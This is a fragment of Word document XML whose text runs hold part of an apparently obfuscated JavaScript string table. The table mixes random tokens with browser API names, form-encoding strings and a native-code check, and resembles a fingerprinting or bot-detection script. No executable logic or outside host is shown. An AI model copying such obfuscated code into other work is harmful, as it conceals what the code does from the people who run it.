        <w:t>", "uAOjLYBIAoMIQcrI2G86ncVXLSEssRvWSfStojN8ylj1s0lREBZ_d7EZ0ljlqPiEYBvLdS_zd6jbF6w", "hi3mMrInQM8gEZ3Y_xw6", "oHjeG64CFOlGY-iN2m9YsOZ-NhEtgDPvJJ_qpzFft16I2jkfRDZSRppKpHHWuIe-Zkvzb0HbFb3nLsHSU55scqF8WCXy770-05o", "iMN0-2eJlBA", "v4Y", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>XrRxng_P</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "WAXPAJMFSfY4O-rW1i5b_roj", "Q1fWbbs5AdFnIOjO9iBT464", "WagxmkXM7QK0uFcpbeO1AW-JtNyvHoE38GNTYQ", "n-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>NNyWOKkAnFjmck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vMFwySexlg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "_u97pk6Z5A69xENYSZz_GByQ", "8Ps", "k7pD0TKLgSKooTlKSK4", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>djinPthydckqFQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "11GBROZIP7FWZ--mgnlas_lsLxIzlCXsOofzoxoHtgDXknNGGTFNXoNY-i6e7t7jYlftaB-EXeu-c8TAV4x1Yf8i", "EEXNTOpUPNB2KPKqhg4S7IQ", "qINh72e5gQ", "zBiUUeRIXqMbO_C9lGJcrtJ_KVsriTLsO5T_6ggZqg_imxJSDB8KRJUT_HbBsZ-nVFW5dFTKSva2XKSDHd41AfY6Hnqlr_0uzw", "chL6V-8CC-0kCA", "2Vg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PyeY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "filename", "s172fp5sYoRTGQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>querySelectorAll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "target", "1FyYFvhKSrpjbPWQlG51pOc0MA0dzw", "Lohr7WKU3zbNhQ", "c4sFvWjxqj-o9m4", "TbZpyw2Q6Higwg", "Srl4wgS9sF61rwUpCOWJ", "form", "ytURqXnvkgDBsC4DYZHl", "htkPxGCOrQPT0RM", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vacOlVernTU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "W4VSzTS95Gr79mARQMuJNnTlzaDCCYMZ8lN-BZI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>encodeURIComponent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rtts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "537MWbs", "GDKVVed5R44hRZD5", "vvYjoVfk8laC3QQeIaS5EQnX_ZymJsYOjyM", "1usIu2LuzAPK-w", "LUatIPh3K_BU", "number", "3AjkKc4DYcQVBIjU3TZn1o0zTCpFrUWKBA", "O5R-</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>uwyL_WmqrGoSRNzAHmH1ioC-fYU-qw", "PiGYcsdrXus6aaaw", "j6Bp_TmZgXeOkFMcSbjIJ1yWn-zhZMISmTQHasLFRudTQaOj3rOXyQSORpAi", "LXvwO5I5J9NlRQ", "I36hSPAyBw", "VLFQki3izlY","29Qo13DCyFjLhXI", "Wm35U4gWJcc", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HPhTgESk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uiXFDqUEfg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HyyxAoRX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "^[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>][</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>]--", "RkXLdK82AelmQqzfkzdP56NvWDdV7F_LDJm_jUk", "_nmsY91rOr1cWITR-2pXpw", "76kj3Qbbmn3X", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>defineProperty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "0DTUF6ovGPc0WA", "UUCQY-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WeakSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>yesA-HPMqSLcnUMRZw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Xk-3Y_10H5ZXSJjmpwIp2bEaXRdN6EiT", "HFjiTI01PexDTO7r", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OSzuYLMdDIly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Az31NpkkaPUSFw", "BMM18EM", "GSykGYdgCZwQeq3JngF6j7EI", "IdVonR7LjGvlzBl9WA", "8WfXf6AlEtg", "osAZ7GC4vib25w", "w-0bs23nuC7rtnlHVrHVYzKn1IndZeAyiR5_RaDKa_JpL8WB0rq9zD2WAd4iaRkZlZoOqqlYxhpjrxgZsiq6hDSeqZw", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>isArray</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "WH2JFvZDWJF4feSxiFoguOlqWhUHgCOVa9Pviw", "PolwnhKPqkeYwxFJMLfwUjT5pbfuSY9a6FwiNr-XCYksOLLwp673_ie_ZZhDOWRIzL8c", "dI8YuQ", "pop", "1lyMSetFQLl1IOGviFsNoed2Dhs0mTqhKMeyz2RT6TmUgXhdO0oYSZhuvG7Zt8WlQgL9BVqURY6_OdmCTIl5cYoUVi3wpbx82oeQywXmnjsXgVE9kgAz7iFg6IFoUgld8XMNsl4AZlbThsJhLLLmbXjmpNCahuqZjisaX0wIFw-_sqhJa0G9hR3y1EgRUZqgHhjKQgoRE1H32TcifwOqu6nX8OHgFq8Mb4BQp-TzJHrT-5HxCkt6qF_kBNjQd8RpNXcYOYiiwJMd0T9lkSD6tL9z9meEydCcrx0ha_G82WUc_ogUS9frDWIfnRT9R86GporQiKzTFKn_3VOo2tRdf0QDaOvyf0fCMD7NjeHYRbmNwVMMhCmqZnsi4VuA_9CTv2-x9DEs-zRBay8jaXr1vzThrfuz6RzVteDJzUbMOl75u5xVC-mGYId9B9VOvK_lnZD0CKMukBoBY6esMftV8dEOjNqv14ZnfhsgRVLo9UL30G-Dqa4wzvQBJhpS2ZbB21MOJ14ItFb9PVJ5wrdyBb2Zz8szpcpEqAkd7rRlIme6jdPHZ9JDepWdzZ1nzzZjRDJbsztQcA8Bbl9333XS57UH5P5IE91X1yWalpc9WS4QgcLHSRWRJ6Mn6vV9_Pqwmbt93Y056evLTNpDfRj1h4pqHLwCAjoF6hTNjhfEljnAckqi-1dx8CeGd7O29jaZFuWeNXaxvD6MCEC2GiCQDuBNJulbKEEp5VoP07783B_93jatE1R4nlxHeMWK-fHu3jxBIQQj_ZGsZuXOa5S-9bH7YiehWIBt3rJ9KPCIf4Ic7rA4DkEloh0FpihVcXpSwk8AgO8xB__FpjDZa7QPKwEkORC1CXL4mrmEyZtO6nOrDR1rCb-OUMce2P-IkGN_TAL_Xj-gza9DHek7e_LAk4KYzmGVe-jtHREtdBAqyOBtUYNN3gpeLDLFrU8FwQ_1-bA66Rgk8tDM7RCWBCowwVAyYwWymNEKE5pG9SuA_-Ih4W-aCcW7CiEQtxaV4b1JT8lZujC_p776vxCS2bYMrvJHz6yK7nDY9xiLfk6CUwXLvsXLvCyd9eGpAe4iiqFPXYu9mNZTh6K8KtpAPbnALVwt5PLgnnUXDqXZ8uf2wGOYgE8Cg_W29xLp4_uLiNpVrOE5tphcTCpzTL3dPqLlitKkF_0Ix4AasyMOFC1HQEh74S8oNAacuZujreSDP4KnEhK0fEo6kWyVbQT3dwSqmrOdcc93_IbxT_p0LmgFibTHXqVAXy4tyM5JtWrU3ehQjKeyDmsMlyovxUV8HdvMWu5vSKNNQ32UCCrlZaGEoFE7OjTG9Et35ldFcUlVS3AUd4kF1icTCk3vkL_szkPgQbbxs2zqogFWIFzEmytFJtSoEUVaBJwH80eLhwTXe15tnVyLxHa6VQCgLboe1spcaAEZCNXYZherTFJTeNLP-Nw86O4P2LXObZXEOi7TKhq9pulDLa6tECWN8BKmVQZ-VjEy5jTu6ScZC8VkECR6H0o8IiJ0QB1wiri_-d7hRAPysrdGk-</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>UwXdHWedwEm7BnfeolFQR7CxVDonThosTqhEQvwm6XxvEgvWBJUlerVgIWpyo3K8uK3aYPZr6aVmkfHu3YD9R8g4_j9D5avBViQQkNJg51e3pEvG0dx28BLKF5RzGDnIu_W-8bPkIz1UMME68eFDJGhmSQLSGm4w10DVNwfgADLwBa6L9VaYtlgtbvvTTEj-TbYqLCdFuD9Pl9WbHLdlCDYL2e6Jddcup53VCddHqJti9VWTSkoSVPqjTouQb8BmVQOJ4h-BKaTyl9K9uYlAz-CHNAP_REUinjMpTRRAbdnfGxQuEvzDLdefSAf6OjzOOv8SdDDr33k74hbqfGy6GGY9LEHC0uvx8eeG3GY65Wbsrb5xzLVecFANRxD1lcPAshwGcWWo9B-t9zwXjJnOZexxrPzR3Z4tL0Yer6oPG7Ki-GKma-PlvMDUPUt8uw8W1e9aHMwIBkKLbmdf-y4Oi7YczmbdIKRJXr2DGDNEbSQuPkrphOyW5mR9DIVIJCBb8JTt6ny0btpkAa39uyTABQhxFnT6dQgtj3_kAfpPFNpo_H-lERljVtG_kOTCKmB6lROD_wtXgctUru_wEQYhNr8Tw43r_ifky3Sz882iU9y6TAPuuCVf1p56fM0nD-g9ntvv1QQb5w-bUBBQpxOtzBLGbA_a032QLRUaJepBtDD1KP89JYc_N17XFxTGjaD_NeF2uorXGY3CAVvzZb7yVNh3vrc_-ssT7pRfeOtwmzJhHGIrvo5GZ8KoKghefXn2uYJ99jxY68puAZgNQ16pyZhh4cR6a7ghuno6_cC33h7W9b35F__X5QVNum3AvxfdeDT3DoiUyXugJtz6MWlkIeZyAvC0PD5mbUuT50w4Nj3MIiCayK-mFJarsjYxvQVf6oqFsXKj2LdqUjYGYQTEvgcAzhfAhJ_muopeA7G4pn26jFqbAMV5coUy0Rz5f2t4uJcRBFsrlVIIpfv9kgSUYxgNeBrzU8aYXv56rHolCIwz0Kf0nZimohPsMp6CvjPLPq1z4C-kjbhepd40Bvq5wKyPddQAcfYnfXW2y7fXmnohTV90fa1N1vfcqlQ6euUs-OJ2d-Q8qb-vPQSdCRlJSPIg9Wf38dWzBenUOMm5rhhRGHs5RSMYoVxhq02IOaN6mnM_7lWxGMMjpZ7eRg-X4_LMOoOkLrqCbW9yGXdk7SSZ0BVR7BVfXKBclRQzVxtOkfvEjQnO1i9fvSxozWtvkFS054Yt8k_7xvN0BZyvCy6_EP5d8wQN29wc2U6GRD_Wn-rVGIRqmhaegdWrHvWL2w2mDUK_LP4bcZpwezKU0R7-svCNHvDaroEgHSedqdhV2M7z3v33a4OmEKwoWvOHwB4XSsGB_W5Rejd02D9GGLEX6k36cKDV1BfVfG6ImHr0iGc3kbaC-VFIjMPVT3M5CtnyKQpCRje9v-mw1Oi1lxCR6ia29ivq1KwOsDfrbtyhKMZS4IGm1lb9P9uk5rZMBdfakwBsiWDiZoMGdJhtHg9R9WittEcMrn6Zd1HSyYhBCSwtVPT5Iqaaio5c_oVc0xMKmHydDAqsBMmhrgIe3rT5lJ3iUtJDsa-hDBHKkmNU_IDBHf8HutQc2MEbKJhHJyAqyruEHlX_tEx4ZsYgQ7DqW6Vt0EJh770gN32phS_XF3zGciqVfESdomxzJPQUyjcbkODRbOj3ujZrJgfb8BYwMyPS8r0rAs7REEKN_dyqhX8xzpQkHcSn-5ec8WMwYxnQ7RjPFcokahSMs", "86Nj5Ta3s1-X", "cn0", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nrtt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-xo", "ZagTqByrx1Lylj8", "j9V_xjqBsEvXwhc", "reduce", "98hJjjKUkhiB_GAaQe4", "FvtZmCmEuEj4_SVKTPE", "kd19yQWE_ECOphEpbJv-TjS8", "A609-Q", "Math", "EcI", "No9grwyC-Hw", "QTqEWP5kLboKVKI", "CBebbM1vVqMWRp0", "Om6mD9N8Nqp3", "01S_F50", "LGXcZ7klEfdxcqfZhBZJ57R8RwZI8FnLEYehmklGnmeqqEETUERzfPhzzVanwJ-3R0uiWX8", "DGHjEqQEN8tMS8nn8zsgna8FO256m1qYMqeBvV9s2k_h9GVrKF9uLNMjtiSmlPfCJCGWQ</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>B2-YLrQBP7qGg", "s2DOKqJ2LNpSbLjb6Q", "7yaZQ-dKf64NOOOqjzcU9bw1Pxtp3TL1Jw", "b4kxuRzq4Q", "E7g54Veq", "X0m6B9lWcg", "8CbDWbwGDs0PML2m31oTg9l8ChMUmyv6Tg", "myiqL8NKeI8", "sqVK2VmRngo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LEPSOpMJIutz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "5eQD7FHy7S0", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ryDNGaA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "abs", "LlapLcJHVJ4", "b5tYwCKY02yp", "-2\u202EYuuMIdcQn\u202D", "kTTwJIsjFM1BQN3SvV8x3ZEzW2VC9g", "children", "NcYMjG_z7Db-zzBMKNI", "function", "zpE_n1Lj-gbapRI", "O2jeQqpFF_gxLaU", "U8MfsWXI8iWXiAM-Q-XLSzE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>QFi-NdhjDg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "XtdalXyujU_S_WIeIK-LdRz68Y7vTeZ53w", "8CSDbPptaacjeaL2", "haIY4VnkwjqI5AQzBtKFEkfi", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GVyTGg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nodeName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "6TzFK6c6bfctcqq5yEkPrMlzVxBZ-zn_Xcbk2klXu2TNxVlLBgVSUb5J1xP5jM3qQ0r0WC2dBtq1KsHEeqIgHw", "match", "C6Ur43rm3x3Zzlc", "2cB87miNhgI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>toString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "E61hywjqlA", "PGDNZ5kZB9x-cd7B3wM", "interactive", "y-5C10uBjhfKlnQ", "qbo51XzQ7g", "min", "-5gc1WfC13uprj5JDbmI", "SapNkz-f726EjWA4HuHZ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setPrototypeOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "any", "bst0jze6qXak", "detail", "sJxGyV-Jrln7xRZrTIk", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TGc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ltltkQ-Hv0XJvUtSfw", "ga003CvjqGvbtxhCRfymCGk", "f_cbvHb23A", "PXKyBN04FpxiMM_k2xVm_Lo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>XQbKHoYdVg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "34teyWz0zAncqDI-R4nPMQ", "-2HzdoQ3Rto", "18h2ggX1hQ", "l3Q", "pEv2LuA", "hidden", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "lc4PomaMvQLRkWl1YabaTQ2V", "Cc9MkDePkCDp-Hsa", "JmGAKOt8HahlOPXc", "51v1cdk4IqtFDcmJvjQ4gLxSfHVt6U6QG9A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lrw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Y0C4aJ1pDIVwTw", "9wL2cYgyBvghEJOP0W47qP9PKDA", "r-5wg2my_z6q8UkbGa30VDyjoY7DXqo", "CBf9e4QtYdpJVcq8_zEqkdpcM3hi4QjLVLqz90YC5kn48A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dTqqeMg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "4mOqd-RPOKtLftSjjn4", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dispatchEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>addEventListener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "RYx31QOB8Vmn2lZ8AeyeL0ut8LqObLl-xFMEB_X5PQ", "Go0q-wuE2g", "2F6XC-5FRK1xObi9mXVTvf0rJwoGhmavct-1wi1k-HzDzy4Pd1MaLsRU42HJ", "BNVs1Fs", "Mwy8QvpJbbRxHA", "NuJm2w-rznLE2FgOBw", "nNt9yxSC9lLJjlQxL7HlSh_HsuzhTvIy93stYrG_E40", "8SKXD_IcSbFu", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>attachEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "x9UxxU_H2GfWxwcjdb3oWzyDz-7bRtQL", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>XlI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "undefined", "13n0cKc6Rg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pXs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "catch", "substring", "zMNB_D-0m2z1", "SQHWQ9YcNtkvUYD20A", "sSWXbu91QvQ", "6jOVSIYxaLI0QoT41Q", "3BmUVo0", "DSzWeIIucOoqQtf66ngjt_hcZHc7", "wgS4aOITMI8", "6CDMVI4J", "mFDRVo87P69HdPflwA", "6xH3fpwrDO8tSd7p1TRY3bw", "round", "qjHRb7EhCuouLbmemG4I", "1mbfdvRKW95hVcvTgw", "n7cFjhHJ", "bwezb85xX88uNIQ", "aCWAEOE8PKVEZ50", "N12RKORyAJZ8a7w", "Yz_6d58EBuYUMs6H1T5J", "BgPYJ6Y6ZesuEA", "u3bSQL0jY-5bKPit", "A_pC8TPO4Q", "AoYVxSLsgGv5oSEtLtKedXnj-MydDuI8gBIeWNnfWO9tS7HY9q7dkz-Ye8lFHVdg7N8juPJN3Cdg", "Lqxf9AejoG-JszY9Hw", "bubbles", "itNNjzOd5Ejuvi5NB4evcziH88L1D8xi", "x&gt;&gt;     var g = ["</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fromCharCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "p2OdCdJjYo5AVq3VnWcz579u", "owuuWpM0VbA2Iv7tqnVh1JoEOUgQ8kSXRovK5Dcmuw", "_fI43x6o0WOT2E0ueLziHA", "ckjUauR6W752VQ", "ClyafP4TOrlk", "2Ypz-iaCjG2lmUsAVKLFAlGanuXaeNgfkDE7cMvORQ", "zNlb-nqt-mz4uw", "I3uSbfxzJQ", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iudGmg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "{\\s*\\[\\s*native\\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s+code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\\s*]\\s*}\\s*$", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fyTldsREXQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CdsUiA-ZxEfxiic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "x7VfgHDUsmit_QUp", "VTCaefR0WQ", "PIUjxkHUqBmWigYCMer4T3SB47k", "NHfjbshWBP9ObrY", "application\x2Fx-www-form-urlencoded", "PZsu5Brjvyi59HBj", "Y2WQUft6DZZYH4TtvSc6", "MHE", "^(?:[\\0-\\t\\x0B\\f\\x0E-\\u2027\\u202A-\\uD7FF\\uE000-\\uFFFF]|[\\uD800-\\uDBFF][\\uDC00-\\uDFFF]|[\\uD800-\\uDBFF](?![\\uDC00-\\uDFFF])|(?:[^\\uD800-\\uDBFF]|^)[\\uDC00-\\uDFFF])$", "SmLeB7IDDb5zfA", "uFWxBehfSKN6Sp3ktl0UzA", "fEiFXd1E", "ORuFDtNFO4k_Yg", "MnC6NcJ7LcsCGc_OsjsthJpUME4-oFXPB_E", "wC6We9lmWJ4cEpSj8mxy0vE8", "Ib5J1TiEjniowzZ-CIzLXzz7nNuJ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MDyCecdmWekWbrytiQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "24RBxzOJziCX7A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setTimeout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "aAOzO_0faKlMRA", "vELqZ5suX9FSAQ", "5803ol779AbH8kgXKf6kAEPV6J62N5EX7WRZNY6y", "\uD83C\uDFF4\uDB40\uDC67\uDB40\uDC62\uDB40\uDC65\uDB40\uDC6E\uDB40\uDC67\uDB40\uDC7F", "gw24PM0oOtMJ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onreadystatechange</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "QnegWe5abZtfVg", "name", "JmWMSexUJZwJbaT_1w", "49V6ukuOv1z20kc6E4ekUx7U3rvLdNMK2mRfC9ygXLZwYPa57pfytyXhCo02dw", "oz3IP-9OcA", "DRjjA8xoGA", "yKEJl3rHgDKm9XsyAofWbHO6zo_DRf5u5xM6Ss_VPq1cEvHQ8LnQ0VHzYadGbwhnj8Ap18xAh29z5VoNhVe3sH2ez6JyYGnp", "0MsnwV-MoS_W7zV4QeXXUB2WqZWNNN8", "bg-Vau5CV4w", "l5AJkXjO", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LGuPQQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "qmu0ceZsNL9VDI-5j0ot", "domain", "d1GNMo9ETsZwPLmPuA9M", "crEN-zrDwWjs_WZNK96PM0Gh2JaQJa5lwg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ReferenceError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Go0e2HU", "is9ArjOnlDTqp25SRYPdcBa3lI3YYf49hgFkSvzZY7RVZsPZw7D012aHEcQ2JT8DnZIQ56NW_AF46w", "W0OnYpZGYdQQUciNrWtxm6lDEThq5xHWcq-m43o", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OffscreenCanvas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "33_S", "a4tisxylnnDt8xg", "iPMOj2HK0ho", "Z5EqgH7f7wE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parseInt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "XHzTRPMYBMVqIe2jnhYX7o9jUFVL2X68KuDWzW9I2miP0yc-OEFMDZFg1jiJyri5VU8", "IkqgUcAXJ6lBbw", "WZ0OlGbexQK2-j82X8yCOV_2gYWdA69s-3UKC_qTAKkaBf35_5GazEisQ_1dG2lphNR_wc4Qh3kj9E96tx3m_SXVr-o6bHDiB386POlIXe3BFYGrFav0EPb-QXI", "5zTEcNYre5V0OA", "jXLxUZQ-bMNuevW5tz1o1qRV", "D74", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bDKbeclZUqkceQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "d9MCsgbfwU_7oQ", "9CuOY_Z8COMEfKeLkQ", "configurable", "JXC5IMVyb7V_", "ExPoTYlqX8wLTZbwrQFeydcqMnIy0lSAArSdyEYxhEWSn04rMTdbN9IhtWyS4rP5GH31RR6jdpHJTpX_ScUNN79hVg", "2zzzSIEfSt8CFNK55mUpldYINHYqlQLjcfXD7joyxU_bhm4ram1eJ9AXojDOoP3sbzjId1Gnf96_Yt_SNqA", "Zo0ttRXq4X8", "rrFu5Ru4tFiewkVkarn6RhGX7_HzfNBTzTAXdt3wC8h-Zoiw0KC75GeaV5kpfiRStece5PZ2oGZI2HQ9tXuchy7zs8cCQEvFMGZjb84EfMzwd7DceMfWBNOFHy3c-r3wToHoRPrjju8wZzKyzVQlpdQBQTpoYx00Mcb48-nr_6JARkO-m4hccuoXN6m9s39I6fln_fP6-bgWLsDHnOITWVg9FxEN_UWgji2vVQEFgI0yGHgQ4LvDSfUE4Sg13TOI1p7503gdMGXgLtKH</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
